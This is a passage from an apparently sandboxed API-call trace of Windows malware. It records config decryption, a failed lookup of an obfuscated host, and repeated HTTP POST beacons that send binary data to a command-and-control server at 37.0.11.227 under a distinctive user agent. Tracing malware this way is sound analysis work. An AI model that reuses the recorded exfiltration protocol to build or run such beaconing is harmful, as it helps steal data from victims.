(pAddrInfo=0x6a9dc0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeac0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0194.495] GetProcessHeap () returned 0x690000 [0194.495] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0194.495] GetProcessHeap () returned 0x690000 [0194.495] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0194.496] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0194.497] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0194.497] GetProcessHeap () returned 0x690000 [0194.497] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0194.497] GetProcessHeap () returned 0x690000 [0194.497] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0194.497] GetProcessHeap () returned 0x690000 [0194.497] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0194.498] GetProcessHeap () returned 0x690000 [0194.498] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0194.498] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0194.499] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0194.499] GetProcessHeap () returned 0x690000 [0194.499] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0194.499] GetProcessHeap () returned 0x690000 [0194.499] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0194.499] send (s=0x3c4, buf=0x6abd08*, len=242, flags=0) returned 242 [0194.500] send (s=0x3c4, buf=0x6aba40*, len=159, flags=0) returned 159 [0194.500] GetProcessHeap () returned 0x690000 [0194.500] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0194.500] recv (in: s=0x3c4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0194.563] GetProcessHeap () returned 0x690000 [0194.564] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0194.564] GetProcessHeap () returned 0x690000 [0194.565] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0194.565] GetProcessHeap () returned 0x690000 [0194.565] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0194.566] GetProcessHeap () returned 0x690000 [0194.566] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0194.566] closesocket (s=0x3c4) returned 0 [0194.567] GetProcessHeap () returned 0x690000 [0194.567] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0194.567] GetProcessHeap () returned 0x690000 [0194.567] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0194.568] GetProcessHeap () returned 0x690000 [0194.568] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0194.568] GetProcessHeap () returned 0x690000 [0194.568] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0194.568] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1148) returned 0x3c4 [0194.572] Sleep (dwMilliseconds=0xea60) [0194.573] GetProcessHeap () returned 0x690000 [0194.573] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0194.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.574] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0194.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.604] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0194.612] GetProcessHeap () returned 0x690000 [0194.612] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0194.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.613] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0194.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.614] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0194.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.615] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0194.615] GetProcessHeap () returned 0x690000 [0194.615] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0194.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.620] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0194.620] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.621] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0194.621] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.622] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0194.622] GetProcessHeap () returned 0x690000 [0194.622] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0194.622] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.623] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0194.623] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.623] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0194.624] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.624] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0194.625] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.625] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0194.625] GetProcessHeap () returned 0x690000 [0194.625] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0194.634] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0194.638] GetProcessHeap () returned 0x690000 [0194.638] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0194.638] GetProcessHeap () returned 0x690000 [0194.639] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0194.639] GetProcessHeap () returned 0x690000 [0194.639] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0194.639] GetProcessHeap () returned 0x690000 [0194.639] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0194.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.640] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0194.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.649] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0194.656] GetProcessHeap () returned 0x690000 [0194.656] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0194.660] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.660] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0194.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.661] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0194.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.662] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0194.662] GetProcessHeap () returned 0x690000 [0194.663] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0194.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.664] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0194.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.665] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0194.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.666] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0194.666] GetProcessHeap () returned 0x690000 [0194.666] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0194.667] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.667] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0194.668] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.669] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0194.670] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.670] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0194.671] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.671] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0194.671] GetProcessHeap () returned 0x690000 [0194.671] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0194.671] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a99b0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0194.671] GetProcessHeap () returned 0x690000 [0194.671] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4f0 [0194.671] socket (af=2, type=1, protocol=6) returned 0x3c8 [0194.672] connect (s=0x3c8, name=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0194.767] FreeAddrInfoW (pAddrInfo=0x6a99b0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0194.767] GetProcessHeap () returned 0x690000 [0194.767] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0194.767] GetProcessHeap () returned 0x690000 [0194.767] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b3f90 [0194.768] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0194.769] wvsprintfA (in: param_1=0x6b3f90, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0194.769] GetProcessHeap () returned 0x690000 [0194.769] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0194.769] GetProcessHeap () returned 0x690000 [0194.770] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b3f90 | out: hHeap=0x690000) returned 1 [0194.770] GetProcessHeap () returned 0x690000 [0194.770] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0194.770] GetProcessHeap () returned 0x690000 [0194.770] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b3f90 [0194.770] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0194.773] wvsprintfA (in: param_1=0x6b3f90, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0194.773] GetProcessHeap () returned 0x690000 [0194.773] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6a91a8 [0194.773] GetProcessHeap () returned 0x690000 [0194.773] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b3f90 | out: hHeap=0x690000) returned 1 [0194.773] send (s=0x3c8, buf=0x6a91a8*, len=242, flags=0) returned 242 [0194.774] send (s=0x3c8, buf=0x6aba40*, len=159, flags=0) returned 159 [0194.774] GetProcessHeap () returned 0x690000 [0194.774] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b3f90 [0194.774] recv (in: s=0x3c8, buf=0x6b3f90, len=4048, flags=0 | out: buf=0x6b3f90*) returned 204 [0194.852] GetProcessHeap () returned 0x690000 [0194.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a91a8 | out: hHeap=0x690000) returned 1 [0194.852] GetProcessHeap () returned 0x690000 [0194.853] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0194.853] GetProcessHeap () returned 0x690000 [0194.853] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0194.853] GetProcessHeap () returned 0x690000 [0194.853] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0194.853] closesocket (s=0x3c8) returned 0 [0194.854] GetProcessHeap () returned 0x690000 [0194.854] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x690000) returned 1 [0194.854] GetProcessHeap () returned 0x690000 [0194.854] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0194.854] GetProcessHeap () returned 0x690000 [0194.854] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0194.854] GetProcessHeap () returned 0x690000 [0194.854] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0194.855] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b3f90, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1150) returned 0x3c8 [0194.857] Sleep (dwMilliseconds=0xea60) [0194.859] GetProcessHeap () returned 0x690000 [0194.859] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0194.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.860] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0194.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.867] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0194.872] GetProcessHeap () returned 0x690000 [0194.872] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0194.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.873] CryptImportKey (in: hProv=0x6af188, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0194.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.874] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0194.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.874] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0194.875] GetProcessHeap () returned 0x690000 [0194.875] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0194.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.877] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0194.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.878] CryptDestroyKey (hKey=0x69d628) returned 1 [0194.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.879] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0194.879] GetProcessHeap () returned 0x690000 [0194.879] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0194.880] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.880] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0194.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.891] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0194.892] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.894] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0194.894] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.895] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0194.918] GetProcessHeap () returned 0x690000 [0194.918] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0194.918] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0194.919] GetProcessHeap () returned 0x690000 [0194.919] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0194.919] GetProcessHeap () returned 0x690000 [0194.919] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0194.919] GetProcessHeap () returned 0x690000 [0194.920] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0194.921] GetProcessHeap () returned 0x690000 [0194.921] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0194.922] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.923] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0194.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.934] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0194.941] GetProcessHeap () returned 0x690000 [0194.941] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0194.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.942] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0194.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.943] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0194.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.944] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0194.944] GetProcessHeap () returned 0x690000 [0194.944] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0194.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.945] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0194.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.946] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0194.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0194.947] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0194.947] GetProcessHeap () returned 0x690000 [0194.947] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0194.948] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.948] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0194.948] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.949] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0194.949] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.949] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0194.950] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0194.950] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0194.950] GetProcessHeap () returned 0x690000 [0194.950] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0194.950] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6adc70*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae928*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0194.950] GetProcessHeap () returned 0x690000 [0194.950] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab340 [0194.951] socket (af=2, type=1, protocol=6) returned 0x3cc [0194.951] connect (s=0x3cc, name=0x6ae928*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0194.972] FreeAddrInfoW (pAddrInfo=0x6adc70*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae928*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0194.972] GetProcessHeap () returned 0x690000 [0194.972] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0194.972] GetProcessHeap () returned 0x690000 [0194.972] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0194.972] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0194.973] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0194.973] GetProcessHeap () returned 0x690000 [0194.973] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0194.973] GetProcessHeap () returned 0x690000 [0194.974] HeapFree (in: hHeap=0x690000, dwFlags=0x0, 